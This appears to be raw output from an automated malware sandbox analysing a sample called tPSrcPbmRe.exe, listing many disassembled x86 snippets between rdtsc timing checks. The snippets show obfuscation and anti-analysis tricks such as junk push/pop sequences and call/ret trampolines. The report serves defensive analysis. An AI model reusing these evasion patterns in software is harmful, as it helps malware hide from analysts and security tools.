                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C8F213 second address: C8F224 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jno 00007F9C81394BF6h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C91033 second address: C91039 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C8F224 second address: C8F284 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 nop 0x00000008 ja 00007F9C81394C05h 0x0000000e push dword ptr fs:[00000000h] 0x00000015 mov ebx, dword ptr [ebp+122D2954h] 0x0000001b mov dword ptr fs:[00000000h], esp 0x00000022 mov ebx, dword ptr [ebp+122D267Bh] 0x00000028 movsx ebx, si 0x0000002b mov eax, dword ptr [ebp+122D001Dh] 0x00000031 push FFFFFFFFh 0x00000033 movsx ebx, bx 0x00000036 push eax 0x00000037 push eax 0x00000038 push edx 0x00000039 jmp 00007F9C81394C08h 0x0000003e rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C902DA second address: C902E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C91039 second address: C910C3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push 00000000h 0x0000000d push ebx 0x0000000e call 00007F9C81394BF8h 0x00000013 pop ebx 0x00000014 mov dword ptr [esp+04h], ebx 0x00000018 add dword ptr [esp+04h], 0000001Ch 0x00000020 inc ebx 0x00000021 push ebx 0x00000022 ret 0x00000023 pop ebx 0x00000024 ret 0x00000025 and edi, dword ptr [ebp+12457C52h] 0x0000002b push 00000000h 0x0000002d push 00000000h 0x0000002f push esi 0x00000030 call 00007F9C81394BF8h 0x00000035 pop esi 0x00000036 mov dword ptr [esp+04h], esi 0x0000003a add dword ptr [esp+04h], 0000001Ch 0x00000042 inc esi 0x00000043 push esi 0x00000044 ret 0x00000045 pop esi 0x00000046 ret 0x00000047 jmp 00007F9C81394C05h 0x0000004c push edi 0x0000004d add dword ptr [ebp+1244F8B0h], edi 0x00000053 pop ebx 0x00000054 push eax 0x00000055 pushad 0x00000056 jmp 00007F9C81394BFDh 0x0000005b push esi 0x0000005c push eax 0x0000005d push edx 0x0000005e rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C91FF5 second address: C91FFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C91FFA second address: C92001 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C912F7 second address: C912FD instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C92FF8 second address: C93018 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F9C81394C09h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C92244 second address: C92254 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 pushad 0x00000008 je 00007F9C80FB5666h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C9582E second address: C95838 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F9C81394BF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C95838 second address: C9584E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9C80FB5672h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C958F0 second address: C958F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C958F4 second address: C958FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C97594 second address: C9759B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C9759B second address: C97606 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 jmp 00007F9C80FB5675h 0x0000000d push 00000000h 0x0000000f jns 00007F9C80FB567Eh 0x00000015 push 00000000h 0x00000017 or dword ptr [ebp+1244A4D6h], edx 0x0000001d push edi 0x0000001e pushad 0x0000001f and ch, 0000004Eh 0x00000022 jmp 00007F9C80FB5674h 0x00000027 popad 0x00000028 pop edi 0x00000029 xchg eax, esi 0x0000002a pushad 0x0000002b pushad 0x0000002c jne 00007F9C80FB5666h 0x00000032 push eax 0x00000033 push edx 0x00000034 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C98674 second address: C98686 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9C81394BFEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C98686 second address: C9868B instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C9972B second address: C99732 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C9A77F second address: C9A785 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C9A785 second address: C9A789 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C9A789 second address: C9A78D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C9C884 second address: C9C89E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F9C81394C05h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C9D9FF second address: C9DA03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C9DA03 second address: C9DA1D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9C81394C06h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C9FA43 second address: C9FA48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C9FA48 second address: C9FA52 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F9C81394BFCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C9992F second address: C99933 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C99933 second address: C99947 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9C81394C00h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C99947 second address: C99951 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F9C80FB5666h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C9A8A5 second address: C9A8AC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C9A8AC second address: C9A91D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push ebx 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f pop ebx 0x00000010 nop 0x00000011 push dword ptr fs:[00000000h] 0x00000018 mov edi, dword ptr [ebp+1247BFA5h] 0x0000001e mov dword ptr fs:[00000000h], esp 0x00000025 push 00000000h 0x00000027 push ebp 0x00000028 call 00007F9C80FB5668h 0x0000002d pop ebp 0x0000002e mov dword ptr [esp+04h], ebp 0x00000032 add dword ptr [esp+04h], 00000019h 0x0000003a inc ebp 0x0000003b push ebp 0x0000003c ret 0x0000003d pop ebp 0x0000003e ret 0x0000003f mov ebx, esi 0x00000041 mov eax, dword ptr [ebp+122D14E9h] 0x00000047 pushad 0x00000048 xor bh, 00000000h 0x0000004b mov esi, dword ptr [ebp+122D39A5h] 0x00000051 popad 0x00000052 push FFFFFFFFh 0x00000054 mov dword ptr [ebp+122D2719h], eax 0x0000005a add ebx, 6D291D72h 0x00000060 push eax 0x00000061 pushad 0x00000062 je 00007F9C80FB566Ch 0x00000068 push eax 0x00000069 push edx 0x0000006a rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C9DBB7 second address: C9DBBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C988D7 second address: C988DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C9EA88 second address: C9EA8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C9EA8C second address: C9EA92 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C9EB72 second address: C9EB8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F9C81394C06h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C9EB8F second address: C9EB93 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C9FBC1 second address: C9FC09 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9C81394C08h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F9C81394BFDh 0x0000000e popad 0x0000000f push eax 0x00000010 jbe 00007F9C81394C17h 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F9C81394C05h 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C9FC09 second address: C9FC0D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CA61B5 second address: CA61C1 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F9C81394BFEh 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CA61C1 second address: CA61CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F9C80FB566Eh 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CA647C second address: CA6496 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007F9C81394BFAh 0x00000008 js 00007F9C81394BF6h 0x0000000e pop ecx 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CA8046 second address: CA804D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CA804D second address: CA8053 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C40298 second address: C402C9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9C80FB5673h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edi 0x0000000a jmp 00007F9C80FB5676h 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C4A4F2 second address: C4A525 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 jl 00007F9C81394C27h 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F9C81394C06h 0x00000013 jmp 00007F9C81394BFFh 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CADA76 second address: CADA7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CADA7B second address: CADA81 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CADA81 second address: CADA85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CADB2B second address: CADB31 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CADB31 second address: CADB47 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9C80FB566Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push edi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CADB47 second address: CADB7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 push esi 0x00000007 pop esi 0x00000008 jmp 00007F9C81394C09h 0x0000000d popad 0x0000000e popad 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 jbe 00007F9C81394C04h 0x00000019 pushad 0x0000001a jg 00007F9C81394BF6h 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CADB7D second address: CADB89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov eax, dword ptr [eax] 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CADB89 second address: CADB8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CB43C3 second address: CB43C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CB43C9 second address: CB43CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CB43CE second address: CB43D3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CB3831 second address: CB3839 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CB3C01 second address: CB3C05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CB3C05 second address: CB3C0B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CB3D1B second address: CB3D21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CB3D21 second address: CB3D2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F9C81394BF6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CB662C second address: CB6632 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CB6632 second address: CB6653 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F9C81394C03h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edx 0x0000000c jp 00007F9C81394BF6h 0x00000012 pop edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CB6653 second address: CB6659 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CB6659 second address: CB665D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CB9BF5 second address: CB9C00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop esi 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CB9C00 second address: CB9C04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CB9C04 second address: CB9C1B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9C80FB5671h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CB9C1B second address: CB9C23 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CB9C23 second address: CB9C27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CB9C27 second address: CB9C39 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F9C81394BF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c js 00007F9C81394BF6h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C81753 second address: C81757 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C81757 second address: C8181B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9C81394C06h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b pushad 0x0000000c pushad 0x0000000d jp 00007F9C81394BF6h 0x00000013 jmp 00007F9C81394BFFh 0x00000018 popad 0x00000019 jmp 00007F9C81394C04h 0x0000001e popad 0x0000001f nop 0x00000020 push 00000000h 0x00000022 push edx 0x00000023 call 00007F9C81394BF8h 0x00000028 pop edx 0x00000029 mov dword ptr [esp+04h], edx 0x0000002d add dword ptr [esp+04h], 0000001Ch 0x00000035 inc edx 0x00000036 push edx 0x00000037 ret 0x00000038 pop edx 0x00000039 ret 0x0000003a jmp 00007F9C81394C00h 0x0000003f lea eax, dword ptr [ebp+1247D4D6h] 0x00000045 push 00000000h 0x00000047 push ecx 0x00000048 call 00007F9C81394BF8h 0x0000004d pop ecx 0x0000004e mov dword ptr [esp+04h], ecx 0x00000052 add dword ptr [esp+04h], 00000015h 0x0000005a inc ecx 0x0000005b push ecx 0x0000005c ret 0x0000005d pop ecx 0x0000005e ret 0x0000005f call 00007F9C81394C02h 0x00000064 mov dword ptr [ebp+122D2FA8h], ecx 0x0000006a pop edx 0x0000006b nop 0x0000006c pushad 0x0000006d push eax 0x0000006e push edx 0x0000006f jnc 00007F9C81394BF6h 0x00000075 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C81A17 second address: C81A1B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C81A1B second address: C81A24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C81D93 second address: C81D97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C81D97 second address: C81D9D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C81D9D second address: C81DA1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C81E94 second address: C81E9E instructions: 0x00000000 rdtsc 0x00000002 ja 00007F9C81394BF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C81E9E second address: C81EA4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C81EA4 second address: C81EFF instructions: 0x00000000 rdtsc 0x00000002 jng 00007F9C81394BF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c add dword ptr [esp], 2484F71Ah 0x00000013 push 00000000h 0x00000015 push eax 0x00000016 call 00007F9C81394BF8h 0x0000001b pop eax 0x0000001c mov dword ptr [esp+04h], eax 0x00000020 add dword ptr [esp+04h], 00000016h 0x00000028 inc eax 0x00000029 push eax 0x0000002a ret 0x0000002b pop eax 0x0000002c ret 0x0000002d pushad 0x0000002e call 00007F9C81394BFAh 0x00000033 mov dl, DEh 0x00000035 pop ebx 0x00000036 ja 00007F9C81394BFCh 0x0000003c popad 0x0000003d call 00007F9C81394BF9h 0x00000042 push eax 0x00000043 push edx 0x00000044 push eax 0x00000045 push edx 0x00000046 push eax 0x00000047 pop eax 0x00000048 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C81EFF second address: C81F05 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C81F05 second address: C81F40 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 ja 00007F9C81394C08h 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 pushad 0x00000017 popad 0x00000018 jmp 00007F9C81394C00h 0x0000001d popad 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C82049 second address: C8204F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C8204F second address: C82053 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
